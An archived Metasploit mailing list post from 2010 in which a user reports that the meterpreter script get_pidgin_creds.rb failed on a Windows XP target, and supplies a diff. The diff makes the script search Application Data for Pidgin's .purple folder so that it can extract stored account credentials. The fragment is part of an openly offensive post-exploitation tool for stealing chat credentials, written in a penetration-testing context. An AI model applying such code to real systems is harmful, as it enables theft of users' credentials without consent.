Metasploit mailing list archives
get_pidgin_creds.rb
From: Ryan Hayward <hunterotd () gmail com>
Date: Wed, 24 Feb 2010 10:58:56 -0600
I've got a recent SVN version of the framework: root@rhh-desktop:/opt/metasploit3/msf3# svn info | grep -i Revision Revision: 8578 When I tried "run get_pidgin_creds" in meterpreter on an XP target with a freshly installed version of Pidgin (2.6.6), it failed to find the credentials. I dug into it a little, and found that get_pidgin_creds.rb was depending on the .purple directory being in %USERPROFILE%, while my .purple directory was in %USERPROFILE%\Application Data. I made a couple of modifications to the script and got it working for my setup (I also corrected a couple of spelling problems), and the diff is below. r# diff get_pidgin_creds.rb get_pidgin_creds.rb.20100224 41,53c41 < ### If we find the path, let's return it < found = path + "\\" + x < return found < end < ### added this to find the .purple directory in application data < ### which wasn't being found before < @client.fs.dir.foreach(path + "\\Application Data") do |y| < next if y =~ /^(\.|\.\.)$/ < if y =~ (/.purple/) < ### if we find the path, let's return it < found = path + "\\" + x + "\\" + y < return found < end ---
found = true
64,65c52 < ### modified to use pidgin_path, which already has .purple in it < account_file = @client.fs.file.new(path + "\\accounts.xml", "rb") ---
account_file = @client.fs.file.new(path + "\\.purple\\accounts.xml", "rb")
135c122 < print_status("All services are logged at #{dest}") ---
print_status("All services are loged at #{dest}")
138,143c125,127 < ### Find the path (if it exists) for this user, < pidgin_path = check_pidgin(u['userpath']) < if pidgin_path < print_status("Pidgin profile found!") < ### modified to use pidgin_path < filewrt(dest,extract_creds(pidgin_path)) ---
if check_pidgin(u['userpath']) print_status("Pidging profile found!") filewrt(dest,extract_creds(u['userpath']))
145c129 < print_error("Pidgin profile not found!") ---
print_error("Pidging profile not found!")
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- get_pidgin_creds.rb Ryan Hayward (Feb 24)